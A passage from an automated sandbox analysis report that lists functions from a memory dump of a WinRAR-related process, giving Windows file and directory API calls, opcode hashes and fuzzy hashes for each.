                                                                                                                                                                                                                                                • Part of subcall function 00007FF64FE73458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF64FE8413F,?,?,?,?,00000800,00000000,00000000,00007FF64FE838CB,?,?,?,00007FF64FE841EC), ref: 00007FF64FE734A0
                                                                                                                                                                                                                                                • Part of subcall function 00007FF64FE73458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF64FE8413F,?,?,?,?,00000800,00000000,00000000,00007FF64FE838CB,?,?,?,00007FF64FE841EC), ref: 00007FF64FE734D5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                                                                                              • String ID: WinRAR
                                                                                                                                                                                                                                              • API String ID: 977838571-3970807970
                                                                                                                                                                                                                                              • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                              • Instruction ID: a3b293a67b3d749b7ac098b94618939ff5492aa74fc7b118226a2bb72aee528e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02213B26A0CA42A1EA50BF22E9501BAA761FFC9BD2B585031EF4EC7755DE3CD4448600
                                                                                                                                                                                                                                              Function 00007FF64FE71C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2244327787-0
                                                                                                                                                                                                                                              • Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                                                                                              • Instruction ID: 442b28c9680a02ebde9f2110fb0711ced34915a03b2bd34495735b7b875c73f9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40219031E0C746A1EA64BB65E40433967E4BFC1B97F204131EE59CB6C6CF2ED9858B42
                                                                                                                                                                                                                                              Function 00007FF64FE9BB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3094578987-0
                                                                                                                                                                                                                                              • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                              • Instruction ID: 06c150226375d5b74e45747ebe576c3f77d804e439b470da7facfc4944ba7858
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62F0862260CB86E2DA20BF11F5440BD6760FFC9BAAF040130EF9D876A9DF2CD6458B10
                                                                                                                                                                                                                                              Function 00007FF64FE67B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleFileHandleModeType
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4141822043-0
                                                                                                                                                                                                                                              • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                              • Instruction ID: 620146285d6e2ec755ad112b0d8e02a2271ea5e28118bdb78c7f10dff517c07f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DE0EC24E1DA4662FA587B65A8652791B52BF9DB92F942034EE0FCB350EE2CD4858700
                                                                                                                                                                                                                                              Function 00007FF64FE74044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4052775200-0
                                                                                                                                                                                                                                              • Opcode ID: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                                                                                                                                                                                                              • Instruction ID: 2b0c70b1290955435b8ef8576530803de069064ac45ba9ca8a74e2a5551a2898
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7DE1AE22A1C682E5EB20BB65A4001BE67E1FBD1795F444132DB9D87ADAEF7CE481D700
                                                                                                                                                                                                                                              Function 00007FF64FE71AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF64FE67EBE,00000000,00000000,00000000,00000000,00000007,00007FF64FE67C48), ref: 00007FF64FE71B8D
                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF64FE67EBE,00000000,00000000,00000000,00000000,00000007,00007FF64FE67C48), ref: 00007FF64FE71BD7
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                                              • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                              • Instruction ID: b91b5a2491a793558c8cf35c916e97a1ae7c26827291cf8f26cada1071d8aaec
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F31E062A1C78286E760BF20E4053A927A0FB81BBAF105334DA68876C6DF7DD5858700
                                                                                                                                                                                                                                              Function 00007FF64FE720B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                                              • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                              • Instruction ID: 063c2eb860c08ebeb263312688ff9fd8abc09bc72f4a5985d1c9e05806caa66f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D401E521A1D69192EA647B26A40006963A2FFC4BF1F149631EF2DC3BD7CF3CE4418B00
                                                                                                                                                                                                                                              Function 00007FF64FE730C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000800,00007FF64FE7305D,?,?,?,?,?,?,?,?,00007FF64FE84126,?,?,?,?,00000800), ref: 00007FF64FE730F0
                                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF64FE84126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF64FE73119
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                              • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                              • Instruction ID: c4e20f99c9c3191d0be86afdd7e6ac52f0d8f5daf9a0eef0e8d80f93ac810cb1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EF04F21B1C7C195EAA0BB64F8553A963A0BBCDBD5F400531EA9CC379ADE6CD5848B00
                                                                                                                                                                                                                                              Function 00007FF64FE64D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CommandLine
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3253501508-0
                                                                                                                                                                                                                                              • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                              • Instruction ID: 64aa63680128e43ee39e70484a1d3a5488f20466e370743c7fa9b5df5d136467
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10018012A0C646A5FA54BB16A4002BF5BA0BFC5B96F882431FF4D8776ADE3DD4418300
                                                                                                                                                                                                                                              Function 00007FF64FEB4B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                              • Instruction ID: 1e1401de5279ae0ad15d3d1831a3450cabd3f172c10e0c7bbf42d414d65e6c78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB017C41A0C74360FA64FE66AA8467B13907FC4BD2F188A31EF1DC72D6ED2CA4014201